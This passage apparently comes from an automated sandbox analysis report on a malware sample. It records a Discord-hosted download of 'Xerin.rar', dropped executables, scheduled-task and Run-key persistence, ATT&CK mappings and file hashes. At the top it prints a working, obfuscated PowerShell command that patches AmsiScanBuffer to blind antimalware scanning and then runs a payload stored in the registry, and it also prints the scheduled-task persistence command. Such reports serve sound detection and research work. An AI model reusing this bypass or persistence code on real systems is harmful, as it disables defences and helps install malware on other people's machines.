$bFgCcxbHdMc.CreateType();}$slMLYtAFhGnJz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+'d'+'s'+'');$wlPgQLaRsIPqwx=$slMLYtAFhGnJz.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+'roc'+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DOvOgDRjJhhdTOUNOad=esaBdpfYPqbR @([String])([IntPtr]);$XRoytiedwFHQOaQSkxigfQ=esaBdpfYPqbR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WAGwAEwflNL=$slMLYtAFhGnJz.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+'u'+'l'+'eH'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$NoVmClAdcBgPOM=$wlPgQLaRsIPqwx.Invoke($Null,@([Object]$WAGwAEwflNL,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$OtNhCULUGlSQbIhLr=$wlPgQLaRsIPqwx.Invoke($Null,@([Object]$WAGwAEwflNL,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+'c'+''+[Char](116)+'')));$lyVZkfa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NoVmClAdcBgPOM,$DOvOgDRjJhhdTOUNOad).Invoke('am'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+'l'+'');$LofeFgoWrjZhtGzVE=$wlPgQLaRsIPqwx.Invoke($Null,@([Object]$lyVZkfa,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+'Buf'+'f'+''+[Char](101)+''+[Char](114)+'')));$tjmAQMxkKi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OtNhCULUGlSQbIhLr,$XRoytiedwFHQOaQSkxigfQ).Invoke($LofeFgoWrjZhtGzVE,[uint32]8,4,[ref]$tjmAQMxkKi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LofeFgoWrjZhtGzVE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OtNhCULUGlSQbIhLr,$XRoytiedwFHQOaQSkxigfQ).Invoke($LofeFgoWrjZhtGzVE,[uint32]8,0x20,[ref]$tjmAQMxkKi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+''+'t'+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5692

C:\Users\Admin\AppData\Roaming\$77Boy.exe
C:\Users\Admin\AppData\Roaming\$77Boy.exe
2⤵
- Executes dropped EXE
PID:5896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1540

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:3052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1976

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2372

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2536

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3196

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1246679036214775850/1246841848383799467/Xerin.rar?ex=665ddb75&is=665c89f5&hm=e2648adbc695a1280ed7363d8ed05dcaf4ecff6a1482236197486c52e9a3b99f&
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffe344246f8,0x7ffe34424708,0x7ffe34424718
3⤵
PID:2180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
3⤵
PID:4868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
3⤵
PID:3692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
3⤵
PID:4396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
3⤵
PID:2912

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
3⤵
PID:1448

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4828 /prefetch:8
3⤵
PID:3116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
3⤵
PID:3724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
3⤵
PID:5584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:1
3⤵
PID:5364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
3⤵
PID:5776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
3⤵
PID:4964

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Videos\" -an -ai#7zMap10297:66:7zEvent28675
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2880

C:\Users\Admin\Videos\Xerin\XerinFuscatorFucker.exe
"C:\Users\Admin\Videos\Xerin\XerinFuscatorFucker.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2204

C:\Users\Admin\AppData\Local\Temp\XerinFuscatorFucker.exe
"C:\Users\Admin\AppData\Local\Temp\XerinFuscatorFucker.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5136

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\XerinJunk.exe
"C:\Users\Admin\AppData\Local\Temp\XerinJunk.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5284

C:\Users\Admin\AppData\Local\Temp\$77Boy.exe
"C:\Users\Admin\AppData\Local\Temp\$77Boy.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5564

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Boy" /tr "C:\Users\Admin\AppData\Roaming\$77Boy.exe"
5⤵
- Creates scheduled task(s)
PID:5100

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3264

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
4⤵
- Executes dropped EXE
PID:5628

C:\Users\Admin\Videos\Xerin\XerinFuscator.exe
"C:\Users\Admin\Videos\Xerin\XerinFuscator.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5696

C:\Users\Admin\Videos\Xerin\XerinFuscator.exe
"C:\Users\Admin\Videos\Xerin\XerinFuscator.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3552

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3944

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3636

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4684

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4208

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3928

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:920

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2644

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4404

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2808

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:4312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:1936

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2008

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1520

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3624

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4376

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:2136

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5432

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
537815e7cc5c694912ac0308147852e4

SHA1
2ccdd9d9dc637db5462fe8119c0df261146c363c

SHA256
b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f

SHA512
63969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8b167567021ccb1a9fdf073fa9112ef0

SHA1
3baf293fbfaa7c1e7cdacb5f2975737f4ef69898

SHA256
26764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513

SHA512
726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
1d82067de4e70409eb265ba2ef50e943

SHA1
a608f99a9a666d77674caf1a7e0ce71b2442df98

SHA256
037934073b0ee5ee96a3691792c139635cb0be117d9a933670f5771df90bb61f

SHA512
b751090f02b1a218bc83f6303820902275ff3447f568cffe2197ccbd1e631fed43c88c1a21c766af0f22ee397a59592b08df6cdfb2272703ac942df29f6b5088

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
1838f79c9dcdfd0a1b87f90f4d8f0f30

SHA1
929b600985318309afa4db0e13cf8dfd244e9e62

SHA256
c2443604e3012c4b0c04b10a107d5db635accf27112854367fc565193f33dce1

SHA512
b4ed5480d678a5c03ce96aeb593e1004be82343926690705044b93e9cddb0b27189900f23384dadd89ce97fb896837ebcf04830e73aa4bced8a0d037667d8832

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
ce7883ce0aebdc7f3686471d9f2b4907

SHA1
d2b5b2d413f16a523e97b286f633bd5b06e92d00

SHA256
d61d3e44da3b702700d22bbebe495c550aaa3c61f671541c734ff36363b493a1

SHA512
ddfbf425ce8e02820126bde327190af4eed718214fd5e47bd500d4ccd9ac34157ae81b26b41c98f7c0150ece676ff29fdf08964974e2e14363fe9abba4e092c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
10KB

MD5
6545579c101cb0453f29698b910a4d33

SHA1
c8a20b90c4a559b5ff7c0c1cb5315bafa9c91c05

SHA256
8e19138bf7f2b8d6dd078b2d89b75da19f108632d941f30e44bc7e6222dd32de

SHA512
e9ba39ee3c3e6ab9290f9b7b618f07d2dcbbff4c694ca10952f50196d7eb1ab79e96f020a9bc4835614b4e31f74dcaa6ea9cba4fb4483cb6f77d86a885e9b191

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77Boy.exe
Filesize
480KB

MD5
16ade5c3129fd42199fecb3f69535b84

SHA1
092c901bd1e59a76c90a02ebf08a24004e4515ab

SHA256
a1d24de8f0d94088c41fffaa0544cbc047efb98da7700f74bd58db2daaf5ca82

SHA512
ab867abb655e9d59cca88510d824819af9db57c60a942b96542519e4bbe41500e4f5184478db0f9a4b16114f33a429a1fe78301ddea11c5464031c79b97cbfab

Download Submit
C:\Users\Admin\AppData\Local\Temp\40585F64.dll
Filesize
605KB

MD5
e8fc38352862ee9f26ea98310ca6228b

SHA1
d61ca1128339024007be84f2c3a30e30c597b61f

SHA256
6486fd7ba81fc1f22d2bea279e1655dea5a12539256fbba4f8975abda117172b

SHA512
f0663851da02c62f0c36d2246d8186d12c60da98732f0bd4894011c25f00129bc556f6d7f7b229eb940c43d12c1a46a627141191ce5214e9dbc399515ee1214a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll
Filesize
2.1MB

MD5
278752062981db6fe27ba55f5099b8ae

SHA1
8446637986cf4a24e9135ee5c54f3170600e1e83

SHA256
538e6ca6001d609e251f88243409a2cbc9bc0517751843e76485a2c335e7829b

SHA512
142ff82ca90ca63a6a854e866615d742b585c102e8c4de5c773edeb1ac30c2cc2f6bcb190da394e4aadb4ef9518d194d99904463d6e952170d2924b16fcb00a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
Filesize
163KB

MD5
1a7d1b5d24ba30c4d3d5502295ab5e89

SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563

SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\XCore.dll
Filesize
444KB

MD5
e66e01b948d384710e109e7d562581d4

SHA1
ca4f9e82789ced5623792fd168f67b41abf20041

SHA256
aab1a265f0049d3004e1deda5939237a29c7914a46ff0b46c8158ce5384bb4ef

SHA512
21b9309b4407e5e59c3d2af9c8791bcde06c8100beed9fcebb1a710254a3f83cea915fc2e4ce87371c16a43e6e43a46e151ca92cb38dedba9b9f47a5727d8e00

Download Submit
C:\Users\Admin\AppData\Local\Temp\XLoader.dll
Filesize
526KB

MD5
a67b3c5cf1da3dd42294c11e2ddc6df5

SHA1
422e8f46e4e977191ec788dce5a2623dbc232b58

SHA256
0649cf0c59f95bcc4f1ad77f70cc89522ef500d8b103bbe7ba418112c53bc2a4

SHA512
0deeeb282241b790fdf2646600f085fc2c73f9dd376bc503f5abe8387496620377ac330755d153384da5fb035b89bee86146c06c1872d54babc00cbbd358b225

Download Submit
C:\Users\Admin\AppData\Local\Temp\XerinFuscatorFucker.exe
Filesize
639KB

MD5
2de060d3f9f6f67988efb330e29c4fc1

SHA1
